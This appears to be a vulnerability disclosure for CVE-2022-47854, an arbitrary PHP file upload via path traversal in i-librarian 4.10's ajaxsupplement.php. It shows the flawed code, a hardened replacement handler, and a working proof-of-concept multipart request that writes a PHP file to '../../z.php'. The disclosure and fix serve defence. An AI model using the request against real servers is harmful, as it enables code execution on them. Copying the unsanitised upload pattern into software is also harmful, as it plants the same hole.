CVE-2022-47854: Arbitrary file upload in ajaxsupplement.php · Issue #155 · mkucej/i-librarian

i-librarian 4.10 is vulnerable to Arbitrary file upload in ajaxsupplement.php.

Summary

The $_POST['filename'] parameter is not filtered, so a file with a .php suffix can be written into other directories by path traversal.

Detail

Using the replace-PDF function, an attacker who controls the filename parameter can upload a file whose suffix is php and whose content begins with %PDF to any directory.

// ajaxsupplement.php (i-librarian 4.10), abridged: only office formats take the first branch;
// everything else, including a .php upload, falls through to the else branch.
if (in_array($file_extension, array('doc', 'docx', 'vsd', 'xls', 'xlsx', 'ppt', 'pptx', 'odt', 'ods', 'odp'))) {
    ...
} else {
    // $_POST['filename'] is concatenated into the destination path without any sanitization,
    // so "../../z.php" escapes the per-session directory.
    move_uploaded_file($_FILES['form_new_file']['tmp_name'], IL_TEMP_PATH . DIRECTORY_SEPARATOR . 'lib_' . session_id() . DIRECTORY_SEPARATOR . $_POST['filename']);
}
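The defect above has two independent causes: the destination path trusts $_POST['filename'] (traversal), and there is no allowlist on the extension of files that reach the else branch (arbitrary .php). A "%PDF" magic-byte check on its own would not help, since the PoC simply prepends that string. The following is an added example of a hardened version of that move, written for this page and not taken from i-librarian; it assumes the same inputs ($_FILES['form_new_file'], $_POST['filename']) and the same IL_TEMP_PATH constant, while the helper name safe_upload_destination and the allowlist are illustrative choices.

```php
<?php
// Added example, not i-librarian's code. Assumes IL_TEMP_PATH is defined as in the project.

function safe_upload_destination(string $base_dir, string $requested_name, string $tmp_file): ?string
{
    // 1. Strip every directory component: "../../z.php" becomes "z.php".
    $name = basename($requested_name);

    // 2. Accept only a conservative character set and never a ".." component.
    if ($name === '' || strpos($name, '..') !== false || !preg_match('/^[A-Za-z0-9._-]{1,100}$/', $name)) {
        return null;
    }

    // 3. Allowlist the extension. This is the check the original code lacks for the else branch;
    //    ".php", ".phtml", ".htaccess" and friends are rejected here regardless of content.
    $allowed = ['pdf', 'doc', 'docx', 'vsd', 'xls', 'xlsx', 'ppt', 'pptx', 'odt', 'ods', 'odp'];
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed, true)) {
        return null;
    }

    // 4. Content check for PDFs. Magic bytes alone are not a security boundary (the PoC spoofs
    //    them); they only catch accidental mismatches, so this is defence in depth, not the fix.
    if ($ext === 'pdf') {
        $head = file_get_contents($tmp_file, false, null, 0, 4096);
        if ($head === false || strncmp($head, '%PDF', 4) !== 0) {
            return null;
        }
    }

    // 5. Create the per-session directory if needed and confirm the final path resolves inside it.
    if (!is_dir($base_dir) && !mkdir($base_dir, 0700, true)) {
        return null;
    }
    $dir = realpath($base_dir);
    if ($dir === false) {
        return null;
    }
    $dest = $dir . DIRECTORY_SEPARATOR . $name;
    if (realpath(dirname($dest)) !== $dir) {
        return null; // would only trip if step 1 were ever bypassed; kept as a containment guard
    }
    return $dest;
}

// Usage in the handler, replacing the unguarded move_uploaded_file() call.
$tmp  = $_FILES['form_new_file']['tmp_name'] ?? '';
$dest = safe_upload_destination(
    IL_TEMP_PATH . DIRECTORY_SEPARATOR . 'lib_' . session_id(),
    (string) ($_POST['filename'] ?? ''),
    $tmp
);
if ($dest === null || !is_uploaded_file($tmp)) {
    http_response_code(400);
    exit('Upload rejected.');
}
move_uploaded_file($tmp, $dest);
```

With this in place the PoC request fails at step 3 (extension "php" is not allowlisted) and, even if the allowlist were relaxed, step 1 keeps the file inside the lib_<session> directory. Serving that temp directory with PHP execution disabled (or storing uploads outside the web root) is the complementary server-side control that limits the impact of any future filter bypass.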

POC

The following request demonstrates it:

POST /ajaxsupplement.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------36332819052109193833351732483
Content-Length: 981
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer: http://127.0.0.1/index2.php
Cookie: PHPSESSID=i7l1jt5cp8bbgt41p888aii2r7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="file"

1
-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="filename"

../../z.php
-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="form_new_file"; filename="1.php"
Content-Type: application/pdf

%PDF
<?php phpinfo();?>
-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="form_new_file_link"


-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="form_graphical_abstract"


-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="form_supplementary_file[]"


-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="proxystr"


-----------------------------36332819052109193833351732483--